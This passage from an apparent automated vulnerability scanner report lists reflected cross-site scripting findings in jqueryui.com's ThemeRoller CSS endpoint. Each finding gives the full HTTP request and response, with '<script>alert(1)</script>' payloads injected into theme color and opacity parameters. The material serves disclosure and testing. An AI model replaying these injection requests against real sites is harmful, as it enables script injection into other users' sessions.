Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:37 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 17360


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d6bbb3<script>alert(1)</script>675b0118a3b
*/


/* Component containers
----------------------------------*/
.ui-widget { font-family: Verdana,Arial,sans-serif; font-size: 1.1em; }
.ui-widget input, .ui-widget select, .ui-widget textarea, .ui-
...[SNIP]...

3.105. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgColorContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgColorContent request parameter is copied into the HTML document as plain text between tags. The payload c277b<script>alert(1)</script>b32dc126929 was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffffc277b<script>alert(1)</script>b32dc126929&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:31 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 17360


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
l&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffffc277b<script>alert(1)</script>b32dc126929&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&border
...[SNIP]...

3.106. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgColorDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgColorDefault request parameter is copied into the HTML document as plain text between tags. The payload ccd97<script>alert(1)</script>2206962d927 was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6ccd97<script>alert(1)</script>2206962d927&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:33 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 17360


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6ccd97<script>alert(1)</script>2206962d927&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColor
...[SNIP]...

3.107. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgColorHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgColorHeader request parameter is copied into the HTML document as plain text between tags. The payload a0dc9<script>alert(1)</script>878d7895937 was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccca0dc9<script>alert(1)</script>878d7895937&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:29 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 17360


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify this theme, visit http://jqueryui.com/themeroller/?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccca0dc9<script>alert(1)</script>878d7895937&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&bo
...[SNIP]...

3.108. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgColorHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgColorHighlight request parameter is copied into the HTML document as plain text between tags. The payload fa7d5<script>alert(1)</script>545e47e1537 was submitted in the bgColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee84d7efa7d5<script>alert(1)</script>545e47e1537 HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee84d7e"><script>alert(1)</script>7a510e251a9&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:53:04 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 17499


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee84d7efa7d5<script>alert(1)</script>545e47e1537
*/


/* Component containers
----------------------------------*/
.ui-widget { font-family: Verdana,Arial,sans-serif; font-size: 1.1em; }
.ui-widget input, .ui-widget select, .ui-widget textarea, .ui-
...[SNIP]...

3.109. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgColorHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgColorHover request parameter is copied into the HTML document as plain text between tags. The payload 7eb5f<script>alert(1)</script>3fe933a5c28 was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada7eb5f<script>alert(1)</script>3fe933a5c28&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:35 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 17360


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
cContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada7eb5f<script>alert(1)</script>3fe933a5c28&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d
*/


/* Component containers
----------------------------------*
...[SNIP]...

3.110. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgImgOpacityActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgImgOpacityActive request parameter is copied into the HTML document as plain text between tags. The payload f1d3b<script>alert(1)</script>6b6c02a5e90 was submitted in the bgImgOpacityActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65f1d3b<script>alert(1)</script>6b6c02a5e90&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee84d7e HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee84d7e"><script>alert(1)</script>7a510e251a9&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:53:02 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 17458


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65f1d3b<script>alert(1)</script>6b6c02a5e90&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee84d7e
*/


/* Component containers
----------------------------------*/
.ui-widget { font-family: Verdana,Arial,s
...[SNIP]...

3.111. http://jqueryui.com/themeroller/css/parseTheme.css.php [bgImgOpacityContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the bgImgOpacityContent request parameter is copied into the HTML document as plain text between tags. The payload b0ecb<script>alert(1)</script>d03ff2877d9 was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75b0ecb<script>alert(1)</script>d03ff2877d9&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
